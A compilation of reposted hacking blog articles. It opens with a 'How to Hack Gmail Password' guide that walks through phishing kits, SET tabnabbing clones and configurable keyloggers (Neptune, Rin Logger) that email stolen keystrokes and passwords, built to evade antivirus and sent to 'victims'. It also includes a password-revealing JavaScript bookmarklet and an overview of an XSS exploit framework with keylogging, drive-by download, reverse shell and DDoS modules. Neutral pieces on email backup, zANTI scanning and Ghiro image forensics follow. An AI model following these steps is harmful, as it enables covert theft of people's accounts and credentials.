6 Ways to Hack Gmail Password

Gmail Password Decryptor

GooglePasswordDecryptor is the FREE tool to instantly recover stored Google account passwords by various Google applications as well as popular web browsers. Most of the Google’s desktop applications such as GTalk, Picassa etc store the Google account passwords to prevent hassale of entering the password every time for the user.

http://securityxploded.com/googlepassworddecryptor.php

How to View Hidden Password behind ****

You can use this script when someone has checked the remember me button in the login form of any website and to reveal password from that saved asterisk or encrypted password.

After opening the web page paste the JavaScript given below in the address bar and hit enter

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)%20s%20+=%20f[i].value%20+%20%22n%22;%20}%20}%20if%20(s)%20alert(%22Passwords%20in%20forms%20on%20this%20page:nn%22%20+%20s);%20else%20alert(%22There%20are%20no%20passwords%20in%20forms%20on%20this%20page.%22);})();

Web Browser Pass View

WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 9.0), Mozilla Firefox (All Versions), Google Chrome, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and Gmail, as long as the password is stored by your Web Browser.

http://www.nirsoft.net/utils/web_browser_password.html

How to Hack Gmail Account (Phishing)

First of all download the Gmail Phisher.
http://goo.gl/SfpEq
Extract the rar file now you will get three files as given below:
index.html
log.txt
login.php

Upload all the three files to any of the free Web hosting server. Some Free Web hosting servers are given below you can also find few more for yourself.

http://www.yourfreehosting.net/
http://www.esmartstart.com/
http://www.110mb.com/
http://www.drivehq.com/
http://www.t35.com/


Once you have uploaded all the three files to web hosting server now you have to send these to your victim.

Now After sending Phisher to victim, once the user logs in to his Gmail account using your Phisher, his user ID and password are ours…And these are stored in log.txt what you have to do is just refresh your Web hosting account files.

How to Hack Gmail Password Using Gmail Hacker

First Download Gmail Hacker from http://goo.gl/oQNgd

• Enter your email ID and your password and select the option build
• Now send the Gmail hacker file to victim tell him that this software is to hack Gmail password.
• Ask him to fill all the information required in it and then click on to Hack them.

As he will select the “Hack them” option he will get an error. And you will get his Email Id and Password on your mail.

Hack Gmail Password Using BackTrack

First open your backtrack terminal and type ifconfig to check your IP

Now Again Open Your Backtrack terminal and Type cd  /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4 “Tabnabbing Attack Method”.

In this option we will choose option 2 “Site Cloner”.

Enter the URL of the site you want to clone. In this case http://www.gmail.com and hit enter. SET will clone up the web site. And press return to continue.

Now convert your URL into Google URL using goo.gl and send this link address to your victim via Email or Chat.

When victim open in their browser it should be a message that the page is still loading. so victim start to open another tab. As soon as victim open new tab, our fake website start working. That script will redirect the victim to the phishing page your derived.

Email Address 

Fuente: http://www.hackingarticles.in/6-ways-to-hack-gmail-password/

How to Gmail in a Pen Drive (Mail Stores)

You can backup your All E-mail in to your PC or Pen drive by using Microsoft Outlook express. You can also use software that is MailStore, It is the best software for Email archiving and backup software .You can download Mailstore software from the official website of Mailstore.

First Download Mailstore

Click on the .exe file at your USB stick and click on Archive E-mail

Click on Google mail.

Enter your email address and password. You can test the access of your account by clicking on the Test button

Click on Next. Here you can configure the backup options.

Fuente:http://www.hackingarticles.in/how-to-gmail-in-a-pen-drive-mail-stores/

How to Hack Gmail Facebook using FUD Keylogger

First Download Project Neptune Keylogger
Open the program 
Double click on the program where you downloaded it

First check the button that says “Use Email for Storing Logs” Then change the amount of time the Keylogger sends logs.

In the Email settings tab keep the “smpt.gmail.com” and the port number 587 where it says “Email to Send Keystroke Logs” put your email in that box and in the box under that put the password to your email. 

If you want you can change what email it send the logs too, but otherwise use the same email that you put above. 

Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step. 

Keep all the settings the same, unless you want to disable task manager or block websites now will add some online virus scanning sites to block them —this means that the sites can’t scan the tool for virus.

Go to the installation tab and check the first box in “Startup Settings” Then Choose a place to install in the Installation Directory.
In the Installation Directory I would put it in the “AppData Folder
Then go to Original File Check “Do Nothing with Original File after Install” to keep suspicion level none.
If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.

Now go to ‘Server Creation‘ tab and press ‘Generate New Server’ under ‘server creation’, and give name of your Keylogger and that it… You are done.

You have successfully created a Keylogger server file. Now, simply send this file to your victim via email, once the victim runs our Keylogger, we will key logs every 20 min via email

Fuente:http://www.hackingarticles.in/gmail-facebook-keylogger/

How to Hack Gmail Account

First Download Rin Logger from Download
Run the keylogger file on your pc and click on “Create new”

Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next

Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs. After that hit “verify now” If you get a message saying verified, your good to go, click next.

Now enable the “Install Keylogger” by clicking on it.
Name the file anything you want and select Installation path as “Application Data”, click next

Click on Next

Now, “Enable Website Viewer” by clicking on it.
Click on Next option.

Now, Enable the “Enable File Binder”.
Click on next

Now Enable the “Steal Password”
Click on Next

Fill all the information by yourself. And click on next.

Now, hit on “Save As” and select the location where you want to save your keylogger server file.

And click on “Compile Server”. Now Compile has been done.

 You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.

Fuente:http://www.hackingarticles.in/how-to-hack-gmail-account/

300 cursos online y gratis

Link

http://wwwhatsnew.com/2015/01/25/300-cursos-universitarios-online-y-gratuitos-que-inician-en-febrero/

Network Penetration Testing using Android Phone (zANTI Tutorial Part 1)

zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.

First download from here and install the app in your android phone.

Press start now and then skips the next step.

Move ahead by clicking next and then select the check box to enable penetration testing and press finish.

The next window will show you all the computer and mobiles connected in your network.
Select the desired connected victim from the list. In my case, victim ip is 192.168.0.102
You can see the available actions to scan the victim’s pc. Now click on scan button

Turn on smart scanning and proceed further

Check the scan log.

You can now see the list of open ports of the victim’s pc.

For more information about the penetration testing  of network using zANTI, wait for the upcoming arcticle of the series.

Author: Sommay jain is a budding lawyer. He likes to discover new facts and tools. He has performed the role of a trainee, developer, programmer, cyber law expert. His interests are mainly in IT business, and management.

Fuente: http://www.hackingarticles.in/network-penetration-testing-using-android-phone-zanti-tutorial-part-1/

Ghiro: una herramienta forense para el análisis masivo de imágenes

En muchos casos los investigadores forenses necesitan procesar imágenes digitales como evidencia. En un análisis forense en el que se manejan muchas imágenes es difícil manejar tanta información al menos que se utilice una herramienta que facilite el trabajo.

Ghiro es una herramienta capaz de soportar gigas de imágenes, extraer y organizar la información y mostrarla en un informe en un formato agradable.
Todas las tareas están totalmente automatizadas, sólo tienes que cargar las imágenes y dejar que Ghiro haga el trabajo.

Además Ghiro es un entorno multiusuario, que permite diferentes permisos que se pueden asignar a cada usuario. Cada caso permite agrupar imágenes por tema, y elegir lo que cada usuario pueda ver según el esquema de permisos.

Casos de uso

No sólo los investigadores forenses pueden usarlo diariamente en su laboratorio de análisis, Ghiro puede ser utilizado en muchos escenarios. Algunos ejemplos de casos de uso son los siguientes:

- Si necesitas extraer todos los datos y metadatos ocultos en una imagen de una manera totalmente automatizada
- Si es necesario analizar una gran cantidad de imágenes y no tienes mucho tiempo para leer el informe para todos ellos 
- Si necesitas buscar algún metadato concreto entre un montón de imágenes 
- Si necesitas geolocalizar muchas imágenes y verlas en un mapa 
- Si quieres buscar en una lista de hashes de imágenes "especiales"

De todos modos Ghiro está diseñado para ser usado en muchos otros escenarios, la imaginación es el único límite.

Video

Principales características

- Extracción de metadatos: Los metadatos se dividen en varias categorías según el estándar. Los metadatos de la imagen se extraen y se clasifican. Por ejemplo: EXIF, IPTC, XMP.

- Localización GPS: en los metadatos de cada imagen a veces hay una etiqueta geográfica, información GPS que proporciona la longitud y latitud de donde se tomó la foto. Se lee y la posición se muestra en un mapa.

- Información MIME: El tipo de imagen MIME se detecta para conocer el tipo de imagen que se está tratando, de forma simple (ejemplo: image/jpeg) y extendida.

- Análisis del nivel de error: el análisis del nivel de error (ELA) identifica las áreas dentro de una imagen que se encuentran en diferentes niveles de compresión. La imagen completa debe ser de aproximadamente del mismo nivel, si se detecta alguna diferencia, entonces es probable que haya realizado alguna modificación.

- Extracción de miniaturas (thumbnails): Las miniaturas y sus datos relacionados se extraen de los metadatos de la imagen y se almacenan para su revisión.

- Consistencia de las miniaturas: a veces, cuando una foto es editada, la imagen original se edita pero la miniatura no. Ghiro detecta las diferencias entre las miniaturas y sus correspondientes imágenes.

- Motor de firmas: Más de 120 firmas proporcionan evidencia sobre la mayoría de los datos críticos para resaltar los puntos focales y exposiciones comunes.

- Coincidencia de hashes: supón que estas buscando una imagen y tienes sólo el hash. Puedes proporcionar una lista de hashes y se buscarán todas las imágenes en base a ese/esos hashes.

Web oficial: http://www.getghiro.org/

Fuente: http://www.hackplayers.com/2015/01/ghiro-una-herramienta-forense-para-imagenes.html

OWASP Xenotix XSS Exploit Framework v3 2013

Introduction

Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 3^rd Vulnerability in the OWASP 2013 Web application Vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about XSS.

Some threats due to XSS

XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver.

Client side code injection: A hacker can inject malicious codes and execute them at client side.

DOS: A hacker can perform DOS against a remote server or against the client itself.

Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.

Malware Spreading: A hacker can spread malwares with a website which is vulnerable to XSS.

Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.

Defacing: Temporary or permanent defacement of web application is possible.

What is Xenotix XSS Exploit Framework?

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications.This tool can inject codes into a webpage which are vulnerable to XSS.It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader, a XSS Reverse Shell and a XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.

Features of Xenotix XSS Exploit Framework

Xenotix XSS Exploit Framework is divided into two module
Scanner Module
Built in XSS Payloads
HTML5 compactable Payload list
XSS Auto mode Scanner
XSS Multi-Parameter Scanner
XSS Fuzzer
Exploitation Framework
XSS Keylogger
XSS Executable Drive-by downloader
XSS Payload Encoder
XSS Reverse Shell
XSS DDoSer
XSS Cookie Thief
Scanner Module
Built in Payload List
It is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes HTML5 compactable XSS injection payloads.Most of the XSS filters are implemented using String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.

The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. Xenotix XSS Exploit Framework got the world’s second largest XSS Payload list after IBM AppScan Security which is having 700 million payloads.

XSS Scanner Module

XSS Multi-Parameter Scanner

The Multi-Parameter XSS Scanner comes when you have multiple parameters to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don’t need to test each parameter separately.

XSS Fuzzer

The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application. 

Exploitation Framework

XSS Keylogger

The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP.  PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file.

XSS Executable Drive-by Downloader

Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim. 

XSS Payload Encoder

The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.

XSS Reverse Shell

A XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application exploited with the injectable scripts generated by XSS Reverse Shell when presented to a victim will initiate the drive by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by. 

The advantage of this method is that the reverse shell is downloaded and executed in the victim’s system without his knowledge. But for the execution of reverse shell, it will pop up a UAC dialog requesting for the permission to run the executable. The tool is having an inbuilt Listener that listens to the reverse shell. It is designed in a user friendly manner. All you have to do is to specify the reverse connection IP and port. 

XSS DDoSer

With HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.  WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a bowser behind the scene. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it by abusing CORS, the add-on create numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the ‘Access-Control-Allow-Origin’ header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.

XSS Cookie Thief

It’s the traditional Cookie Stealer but a bit advanced and with real time cookie viewer. This module allows the pentester to create cookie stealing POC.

Features for the Next Build

Current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine Trident. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter and XSS testing by modifying the headers will be included in the next build. XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build.

Conclusion

XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform penetration test on Web Applications against XSS vulnerability and to create POC with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS Scanners or XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner as well as XSS exploitation framework. Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bountyetc. are there. So go for a XSS hunting and grab your bounty.J

About Author

Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He had published different whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest Ethical Hacking Competition. His area of interest includes web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.

Fuente:http://www.hackingarticles.in/owasp-xenotix-xss-exploit-framework-v3-2013/